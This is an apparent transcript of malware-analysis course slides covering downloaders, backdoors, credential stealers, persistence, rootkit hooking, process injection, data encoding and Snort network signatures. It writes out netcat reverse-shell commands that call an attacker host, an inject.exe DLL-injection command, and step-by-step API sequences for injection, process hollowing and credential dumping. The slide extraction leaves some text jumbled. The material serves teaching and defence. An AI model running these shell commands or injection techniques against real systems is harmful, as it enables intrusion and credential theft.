slides - thefengs.com
Download
Report
Transcript slides - thefengs.com
Part 4: Malware Functionality
Chapter
Chapter
Chapter
Chapter
11:
12:
13:
14:
Malware Behavior
Covert Malware Launching
Data Encoding
Malware-focused Network Signatures
Chapter 11: Malware Behavior
Common functionality
1.
2.
3.
4.
5.
6.
Downloaders
Backdoors
Credential stealers
Persistence mechanisms
Privilege escalation
Covering tracks (rootkits)
1. Downloaders
Retrieve additional pieces of malware from
network to execute
Often packaged with an exploit
In Windows, API call URLDownloadtoFileA
used to download
Followed by call WinExec to execute
2. Backdoor
Malware that provides attacker with remote
access to victim machine
Most common type of malware
Commonly use outgoing port 80 (HTTP) to
blend in with other traffic
Commonly implement reverse shells
Allow attacker to execute commands as if they
were on local system
Examples: netcat, cmd.exe, remote
administration tools
netcat
On computer 1, execute program “echo
hello” and redirect output to local netcat
server on 8888
victim$ echo hello | nc –l 8888
Connect to computer 1 at 8888 and redirect
output to file foo.txt
attacker$ nc victim 8888 >foo.txt
attacker$ cat foo.txt
hello
netcat
Backdoor shell listener
victim$ nc –l 8888 –e /bin/sh
Connecting to shell
attacker$ nc comp1 8888
Getting past firewalls and NAT
Connection
Attempt
Attacker
nc victim 8888
Firewall
Or
NAT
X
Victim
nc –l 8888 –e /bin/sh
netcat
Bypass firewalls and NAT by “shoveling a shell”
Make attacker run listener
Victim initiates outgoing connection (e.g. IRC,
HTTP)
attacker$ nc -l 8888
victim$ nc attacker 8888 -e /bin/sh
Connection shovel
Firewall
Attacker
nc –l –p 8888
Victim
nc attacker 8888 –e /bin/sh
Windows reverse shells
cmd.exe equivalent to netcat
CreateProcess
Create a socket and connect it to server
Tie stdin, stdout, and stderr of process to
socket
Multithreaded version can use CreateThread
and CreatePipe
Remote administrator tools
Similar to botnet command and control
Victim beacons outside controller to receive
instructions
Example: Poison Ivy
3. Credential Stealers
3 main types
Programs that monitor user logins
Programs that dump credentials stored in
Windows (e.g. password hashes) that can be
attacked off-line
Programs that log keystrokes
Monitoring user login
Graphical Identification aNd Authentication
(GINA) for Windows Login
Winlogon process started
Winlogon invokes GINA library code
(msgina.dll)
GINA requests credentials
Example: GINA interception
FakeGINA sits between Winlogon and
msgina.dll (Figure 11-2, p. 235)
Exploits mechanism intended to allow other means of
authentication
Configured to run by setting a Windows registry key
HKLM\SOFTWARE\...\Winlogon\GinaDLL set to
fsgina.dll
Winlogon process
winlogon executes
fakegina.dll requests credentials
fakegina.dll passes credentials to msgina.dll
Logout function WlxLoggedOutSAS hooked to store
credentials (Listing 11-1, p. 235-236)
Dumping credentials
Password storage
Typically, only hashes of passwords stored
Users with forgotten passwords issued new ones
Hash function well-known
Dumping hashes allows dictionary attacks since users
with weak passwords subject to brute-force dictionary
attacks off-line
Windows hashes
Security Account Manager (SAM)
Local Security Authority Subsystem Service (LSASS)
Example: lsass dumping
Pwdump, Pass-the-Hash (PSH) toolkits
Pwdump performs DLL injection on
lsass.exe (Local Security Authority
Subsystem Service)
Injects lsaext.dll
GetHash call from pwdump extracts hashes
Can be easily changed to avoid signatures
GrabHash listing (Listing 11-2, p. 237)
Loads library samsrv.dll to get SAM functions
SamIConnect, SamrQueryInformationUser, and
SamIGetPrivateData
Loads library advapi32.dll to get hidden API functions
for decrypting hashes (SystemFunction025,
SystemFunction027)
Logging keystrokes
Records keystrokes so attacker can observe
typed data
Kernel-based keyloggers
Built into keyboard drivers
User-space keyloggers
Use Windows API to hook I/O functions
(SetWindowsHookEx) or poll for state of keys
(GetForegroundWindow and
GetAsyncKeyState)
Example polling keylogger: (Figure 11-3 and
Listing 11-4, p. 239)
4. Persistence mechanisms
Methods to ensure survival of malware on a
system
Windows Registry persistence
Trojaning
DLL load-order hijacking
Windows registry persistence
Common key malware targets
HKEY_LOCAL_MACHINE\SOFTWARE\Microso
ft\Windows\CurrentVersion\Run +
dozens more
AppInit_DLLs
Loaded into every process that loads User32.dll
Stored in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Windows
Space delimited string of DLLs
Windows registry persistence
Common key malware targets
Winlogon
Hooking logged events (logon, logoff, startup, shutdown, lock
screen)
\HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\
When winlogon.exe generates an event, Windows checks the
Notify registry key above for a DLL that will handle it
SvcHost DLLs
All services persist via registry
svchost.exe – generic host process for services that run from DLLs
\HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Svchost
\HKLM\System\CurrentControlSet\Services\ServiceName
Trojaning
Malware patches binary or library to add its
functionality
Example: Nimda, Bliss
Append code in existing section or in new
section
Change entry point to point to virus code
Virus returns to target program after execution
Trojaning using the ELF header
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Halfe_type;
Elf32_Halfe_machine;
Elf32_Worde_version;
Elf32_Addre_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
“This member gives the virtual address to
Elf32_Worde_flags;
which the system first transfers
Elf32_Halfe_ehsize;
control, thus starting the process”
Elf32_Halfe_phentsize;
We can change this to point elsewhere
Elf32_Halfe_phnum;
(not main() )
Elf32_Halfe_shentsize;
Elf32_Halfe_shnum;
Elf32_Halfe_shstrndx;
} Elf32_Ehdr;
interesting!
Trojaning DLLs
DllEntryPoint function tampering
Change code at entry to jump immediately to
malicious code
Malicious code performs pusha to save all
registers in one instruction
Malicious code performs popa to restore all
registers before returning back to legitimate
code
Table 11-1, Listing 11-5, p. 243
Malicious code forces LoadLibrary of
msconf32.dll before returning back to original
entry point
Trojaning DLLs
DLL load-order hijacking
DLL search path in Windows XP
1. Directory from which application was loaded
2. Current directory
3. System directory (GetSystemDirectory
function)
4. 16-bit system directory
5. Windows directory (GetWindowsDirectory
function)
6. Directories in PATH environment variable
Rename malicious library and place high in
path
5. Privilege escalation
Most users run as local administrators
Malware uses privilege escalation for those
that don't
Exploit vulnerable code to obtain administrator
privileges
Many malware frameworks include such
exploits (e.g. http://www.metasploit.com/)
Access to restricted calls such as
TerminateProcess and
CreateRemoteThread
Using SeDebugPrivilege
Modify security token of a process using
AdjustTokenPrivileges to obtain
Initially used as a tool for system-level
debugging
Privilege mistakenly given to normal users
Add SeDebugPrivilege to process to allow
privilege escalation (Listing 11-6, p. 246)
6. Covering tracks – rootkits
Hide malicious activity
Make malicious files, processes, network
connections, and other resources invisible
Most rootkits are kernel-mode to run at the
same level as anti-virus/anti-malware
Function hooking
Mechanism used to redirect function calls to
injected attack code
Replaces legitimate function with alternative one
Two general methods
Function table hooking
Run-time data structures that contain function pointers that
are invoked during program execution
Hot patching function invocation (inline hooking)
Modify JMP/CALL targets in code
Modify function prologues to add detour to trampoline
Targets for hooks and detours
Disable or modify anti-virus process
Disable software updates
Disable periodic “rehooking” code
Modify network operations and services
Modify boot loader
Have boot loader apply patches to kernel before loading
Modify on-disk kernel
Modify boot loader to allow new kernel to pass integrity check
Registry functions
Load on boot via run key in registry
Must hide key from anti-virus after being loaded
Function table hooking (IAT)
Import Address Table (IAT) used to call
functions in libraries
Application code
InternetConnect()
push <call parms>
call [imp_InternetConnect]
…
push ebp
lea ebp, [esp+var_5 8]
sub esp, 29Ch
…
…
Import Address Table
jmp InternetConnect
jmp InternetAutodial
jmp InternetErrorDlg
…
IAT hooking
Modify IAT to hijack a DLL call
Makes a hack ‘portable’ to other applications
Load rootkit hook function into memory
Replace target function’s address in the IAT with address of hook
function
Figure 11-4, p. 247
Application code
InternetConnect()
push <call parms>
call [imp_InternetConnect]
…
push ebp
lea ebp, [esp+var_5 8]
sub esp, 29Ch
…
…
Import Address Table
x
jmp InternetConnect
jmp InternetAutodial
jmp InternetErrorDlg
…
Rootkit Code
IAT hooking
Method
Locate import section from IAT
Find IMAGE_IMPORT_DESCRIPTOR chunk of DLL that exports that
function
Locate IMAGE_THUNK_DATA which holds original address of imported
function
Replace address in IAT to point to your function and have your function
eventually call the original
Detection problems
Legitimate hooking common
Methods such as DLL forwarding makes benign vs. malicious hooks hard to
discern
Late binding
Applications do late-demand binding where function addresses are not
resolved until called
Reduces amount of memory used
But, won’t know what the legitimate values should be!
Example library hooks
Processes rely on APIs provided others
DLLs loaded at runtime into process address space
Kernel32.dll, User32.dll, Gui32.dll, Advapi.dll
Kernel32 loaded into private address space between
0x00010000 and 0x7FFE0000
Example: Hiding files in a directory
Replace FindFirstFile(), FindNextFile() in Kernel32
to skip rootkit files
Other DLLs
DirectX/OpenGL APIs and time functions
Typically hooked to implement cheating in on-line games
Winsock API
Hooked to monitor network traffic
Example library hook
Hook keyboard/DirectInput APIs to obtain
keyboard/mouse events
GetKeyboardState(), GetKeyState(),
GetDeviceState(), etc.
SHORT WINAPI FakeGetAsyncKeyState(int vKey)
{
SHORT nResult = 0;
if (g_bNeedMP) {
if (vKey == VK_M) {
nResult |= 0x8000; //’M’ pressed
g_bNeedMP = FALSE;
}
}
else
nResult = RealGetAsyncKeyState(vKey);
//...
return nResult;
}
Detours
Library developed by Microsoft in 1999
G. Hunt, D. Brubacker, “Detours: Binary Interception of Win32
Functions”, 3rd USENIX Windows NT Symposium, July 1999.
Instrument and extend existing OS and application functionality
simply
Avoids modification of function pointer tables which can be
detected by anti-virus/anti-rootkit technology
A programmer-friendly “feature” of Windows to easily patch functions
Detours modify function in-line
Malware uses to extend application with malicious functions
Commonly used to add malicious DLLs into existing binaries on disk
Adds a new .detour section into PE structure and modifies import
address table using setdll tool in Detours library
Targets include authentication check, DRM checks, anti-virus code,
file system scans
Detour mechanism
Redirect functions inline via detour and trampoline
Save initial instructions of function at the entry point
Inject code (detour) to redirect execution to
interceptor function (trampoline)
Original bytes of function saved in trampoline
Done by inserting jump instruction into function where original
bytes were
Trampoline
Implements 5 replaced bytes of original function
Implements the function you want to execute
jmps back to original target function plus 5
Detour details
5-byte function preamble replaced by jmp
Replaced instructions moved to trampoline
Microsoft intentionally changed preamble to support
Before XP
55
8bec
push ebp
mov ebp, esp
Hard to hook since you must disassemble user code to insert
detour
After XP
8bff
55
8bec
mov edi, edi
push ebp
mov ebp, esp
Easy to hook, exactly 5 bytes
Makes hot patches easy
Detour details
Must
Must
Must
Must
know which OS is being used
ensure no one else has patched the function already
save the instructions being removed by detour
ensure nearby patch addresses
Relative FAR JMP instruction target calculated at run-time
Need to patch this with desired offset at run-time
FAR JMP
Rootkit code
Rest of original function
Removed instructions
FAR JMP
Detour details
More powerful than IAT hooking
Do not have problems with binding time
Functions appearing in multiple tables are
handled in one step
Ensures hook is not overwritten by application
No matter how the function is called, your code will
run
Can be used for both kernel and user functions
Detour example
Modify ZwDeviceIoControlFile to hide
ports
Listing 11-7, p. 248: Get pointer to code
location of function to insert hook into eax
Table 11-2, p. 248: Define “hook byte”
template (detour)
Copy address of hooking function into template
(memcpy)
Listing 11-8, p. 249: Call to install hook bytes
into ZwDeviceIoControlFile call
Hook bytes can be installed deep into function
to avoid detection
In-class exercise
Lab 11-1
Chapter 12: Covert Malware
Launching
Covert Launching Methods
1.
2.
3.
4.
5.
6.
Launchers
Process Injection
Process Replacement
Hook Injection
Detours
APC Injection
1. Launchers
Malware that sets itself up for immediate or
future covert execution
Often contain malware that is to be executed
in a resource section
See previous Lab 11-01
Uses FindResource, LoadResource, and
SizeofResource API calls to extract
2. Process injection
Inject code into another running process
Bypasses host-based firewalls and processspecific security mechanisms
Force process to call VirtualAllocEx, then
WriteProcessMemory to inject code
Two injection types: DLL injection, direct
injection
DLL injection
Force remote process to load a malicious DLL
Most common covert loading technique
Remotely inject code into process that calls
LoadLibrary
OS automatically executes DllMain of newly
loaded libraries
All actions appear to originate from
compromised process
Figure 12-1, p. 255
DLL injection into running
process
DLL injection
Method #1
CreateToolhelp32Snapshot, Process32First,
Process32Next API calls to search process list for victim
Get PID of victim and use OpenProcess to obtain handle
Allocate space for name of malicious DLL in victim process
VirtualAllocEx allocates space in remote process given handle
Call WriteProcessMemory to write string into victim process
where VirtualAllocEx obtained space
Call CreateRemoteThread to start a new thread in victim
lpStartAddress : starting address of thread (set to address of
LoadLibrary)
lpParameter : argument for thread (point to above memory that
stores name of malicious DLL
Listing 12-1, Figure 12-2, p. 255-256
J. Richter, “Load Your 32-bit DLL into Another Process’s
Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5
DLL injection
Preserving original functionality
Still need original functions to work correctly
Injected DLL often set up to call original DLL to support desired
functionality
Interposed between application and real DLL
Example tool
Inject.exe (Aphex)
C:\> inject.exe winlogon “myrootkit.dll”
DLL injection
Method #2 using Windows Debug API
Attacker must have Debug programs rights on system
Attach debugger to process
Break when you want to inject
Analyze PE header to find a usable, writable part of memory
for code
ReadProcessMemory to save code that is there
WriteProcessMemory to write injection code that loads a DLL
into memory space
Include INT 3 at end of injection code for debugger to stop
Set EIP to start of injection code and continue
Breaks when DLL loaded, restore original state of memory (i.e.
remove code to inject DLL)
Even easier with a code cave (no need to save
memory)
Code cave example
Code cave
Communications
Technology Lab
Direct code injection
Similar to DLL injection, but write all code into
victim process directly
No DLL
Requires custom code that will not disrupt victim
process
Often used to inject shellcode
Mechanism
Allocate space for new thread’s data and code
Write data and code
Create new thread pointing to injected code
VirtualAllocEx, WriteProcessMemory, and
CreateRemoteThread
3. Process replacement
Overwrite memory space of running process with malicious
executable
Disguise malware without risking crashes from partial injection
Example: svchost.exe
Start svchost in suspended state
Pass CREATE_SUSPENDED as the dwCreationFlags parameter
when calling CreateProcess (Listing 12-2, 12-3, p. 258)
Release all memory using ZwUnmapViewOfSection
Allocate memory for malicious code via VirtualAllocEx
WriteProcessMemory to write malware sections
SetThreadContext to fix entry point to point to malicious code
ResumeThread to initiate malware
Bypasses firewalls and intrusion prevention systems since svchost
runs many network daemons
4. Hook injection
Interpose malware using Windows hooks
Hooks used to handle messages and events going
to/from applications and operating system
Use malicious hooks to run certain code whenever a
particular message is intercepted (i.e. keystrokes)
Use malicious hooks to ensure a particular DLL is
loaded in a victim's memory space (i.e. process loaded
event)
Types of hooks
Local hooks: observe and manipulate messages
internally within process
Remote hooks: observe and manipulate messages
destined for a remote process
Hook examples
Keyboard hooks
Registering hook code using WH_KEYBOARD or WH_KEYBOARD_LL
hook procedure types to implement keyloggers
Windows hooks
Register hook with SetWindowsHookEx to capture window
events
Targeting threads
Hooks must determine which thread to attach to
Hook targets often obscure to evade Intrusion Prevention
Systems
Malware implements code to get dwThreadId of victim
WH_CBT hook for computer-based training messages
Call SetWindowsHookEx to install hook on remote thread
Then, initiate WH_CBT message to force load
Listing 12-4, p. 261
5. Detours
See previous chapter
PEView of detour Figure 12-4, p. 262
Example: MigBot
Detours two kernel functions:
NtDeviceIoControlFile and
SeAccessCheck
Both are exported and have entries in the PE
header
6. APC injection
APC = Asynchronous Procedure Call
Malware using CreateRemoteThread easily detected
APC allows for a stealthier way to execute code
Each thread has an APC function queue attached to it
Threads execute all functions in APC queue when in an alertable
state (i.e. swapped out)
e.g. after calls to WaitForSingleObjectEx,
WaitForMultipleObjectsEx, and SleepEx
Malware performs APC injection to preempt threads in an
alertable state to get immediate execution of their code
Two forms
Kernel-mode: APC generated for the system or a driver
User-mode: APC generated for an application
APC injection from user space
One thread can queue a function to be invoked in
another via API call QueueUserAPC
WaitForSingleObjectEx is the most common call
to the Windows API
Listing 12-5, p. 263-264
OpenThread followed by QueueUserAPC using
LoadLibraryA on a malicious DLL (dbnet.dll)
Note: calls to CreateToolhelp32Snapshot or
ZwQuerySystemInformation, Process32First,
Process32Next, Thread32First, and Thread32Next
usually precede this snippet
APC injection from kernel space
Malicious drivers in kernel often would like to
execute code in user space
Listing 12-6, p. 264
Kernel code to inject an APC into user space
In-class exercise
Lab 12-1, 12-3
Chapter 13: Data Encoding
Data Encoding
Goal
Defeat signature-detection by obfuscating malicious
content
Encrypt network communication
Hide command and control location
Hide staging file before transmission
Hide from “strings” analysis
Data Encoding methods
1.
2.
3.
4.
Simple Ciphers
Common Cryptographic Algorithms
Custom Encoding
Decoding
1. Simple ciphers
Caesar Cipher
Shift/Rotate characters
XOR
Bit-wise XOR of data with a fixed byte or generated byte stream
Figure 13-1, p. 271
For a fixed byte XOR, can brute force all 256 values to find a
header (MZ) that makes sense (Table 13-1, Listing 13-2, p. 272273)
Some malware uses null-preserving XOR to make detection less
obvious (See 0x12 opcodes everywhere in Listing 13-1, then see
Listing 13-3, p. 274)
Decoding loops easy to identify via searching for xor opcode
Figure 13-2, p. 275)
Simple ciphers
Base-64
From MIME standard
Represents binary data in an ASCII string format
Binary data converted into one of 64 primary characters
[a-zA-Z0-9+/], = used for padding
Every 3-bytes of binary data is encoded in 4-bytes of Base64 (Figure
13-4, p. 277)
Example:
3 byte binary =01001101 01100001 01101110
4 byte Base64 = 010011 010110 000101 101110
TWFu
0 1 2 3 4 5 6
0
A B C D E F G
10
K L M N O P Q
20
U V W X Y Z a
30
e f g h i j k
40
o p q r s t u
50
y z 0 1 2 3 4
60
8 9 + /
7
H
R
b
l
v
5
8
I
S
c
m
w
6
9
J
T
d
n
x
7
Simple ciphers
Base-64 decoding
Look for a string used as an index table
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx
yz0123456789+/
Try on-line conversion tools
Caution: Malware can easily modify index table to
create custom substitution ciphers very easily (see
book example)
2. Cryptographic ciphers
Drawbacks
Crypto libraries are large and easily detected
Must hide the key for symmetric encryption algorithms
Recognizing encrypted code
Imports include well-known OpenSSL or Microsoft
functions (Figure 13-9, p. 282)
Use of cryptographic constants (Figure 13-10, p. 282)
FindCrypt2 plugin in IDA Pro
Or both
Krypto ANALyzer plugin for PEiD (Figure 13-11, p. 283)
Cryptographic ciphers
Recognizing encrypted data
Some malware employs crypto algorithms that do not
have constants (RC4, IDEA generate at run-time) or do
not rely on libraries
Must search for high-entropy content
IDA Pro Entropy Plugin
Figure 13-12, 13-13, p. 284, 285
3. Custom encoding
Look for hints
Trace execution to see suspicious activity in a
tight loop
Example: pseudo-random number generation
followed by xor (Figure 13-14, 13-15, p. 287)
4. Decoding
Self-decoding malware
Malware packaged with decoding routine
Tell-tale sign: strings that don't appear in binary file on
disk, but appear in debugger
Decrypt by setting a breakpoint directly after
decryption routine finishes execution
Malware employing decoding functions
Can sometimes use standard libraries to decode
Python's base64.decodestring() or PyCrypto's functions
(Listing 13-7, 13-8, 13-9, 13-10 p. 289)
Or programmatically use debugger to re-run malware’s
decoding code with chosen parameters
ImmDbg (Listing 13-11, 13-12, p. 291-293)
In-class exercise
Lab 13-1
Chapter 14: Malware-Focused
Network Signatures
Networking and Malware
1.
2.
3.
4.
Network Countermeasures
Safely Investigating an Attacker Online
Content-Based Network Countermeasures
Combining Dynamic and Static Analysis
Techniques
5. Understanding the Attacker's Perspective
1. Network Countermeasures
IP connectivity
Restrict network access using routers and
firewalls
DNS
Reroute known malicious domains to an
internal host (sinkhole)
Content-filters
Proxies, intrusion detection systems, intrusion
prevention systems for intercepting web
requests in order to detect or prevent access
Network Countermeasures
Mine logs, alerts, and packet captures for
forensic information
No risk of infection when performing postmortem analysis versus actively attempting to
run malware
Malware can be programmed to detect active
analysis
Indications of malicious activity
Beacons to malicious sites, especially if done
without DNS query
2. Safely Investigating an
Attacker Online
Indirection
IP address and DNS information
Use network anonymizers such as Tor to hide yourself
Use a virtual machine and virtual networks running through
remote infrastructure (cellular, Amazon EC2, etc)
See Regional Internet Registries to find out organizational
assignment of IP blocks
Query whois records of DNS names to find contact information
metadata (domaintools.com)
Caution
Attacker can bind payload to victim and disappear if something is
amiss
3. Content-Based Network CounterMeasures
Intrusion Detection with Snort
Rules that link together elements that must be true to
fire
Size of payload, flag fields, specific settings of TCP/IP
headers, HTTP headers, content in payload
Table 14-1, p. 299: Wefa7e's HTTP User-Agent
Potential Snort rule to detect Wefa7e p. 303
But, variants of malware may tweak User-Agent
But…what if? p. 306
Could use regexps to modify rule, but not a tenable approach
in general
Malware intentionally generating false positives
4. Combining Dynamic and
Static Analysis Techniques
Steganography in protocols
Attackers mimicking typical web requests
Encoding commands in URLs and HTTP
headers
Encoding commands in meta-data of web
pages
Malware circumventing intrusion detection
filters similar to Tor circumventing censorship
filters
4. Combining Dynamic and
Static Analysis Techniques
Finding networking code to develop signatures
WinSock API (WSAStartup, getaddrinfo, socket, connect,
send, recv, WSAGetLastError)
WinINet API (InternetOpen, InternetConnect,
InternetOpenURL, InternetReadFile,
InternetWriteFile, HTTPOpenRequest, HTTPQueryInfo,
HTTPSendRequest)
COM interface (URLDownloadToFile, CoInitialize,
CoCreateInstance, Navigate)
Finding hard-coded patterns or stable content to create rules
Reverse-engineering encoding or decoding scheme allows for
accurate network signature generation
5. Understanding the Attacker’s
Perspective
Attackers will slightly change payloads to avoid
detection
Strategies
Focus on elements that are part of both endpoints
Focus on elements of protocol known to be part of a
key (see above)
Operate at a level that is different than other
defenders (so that an attacker side-stepping another
filter will not affect yours)
In-class exercise
Lab 14-1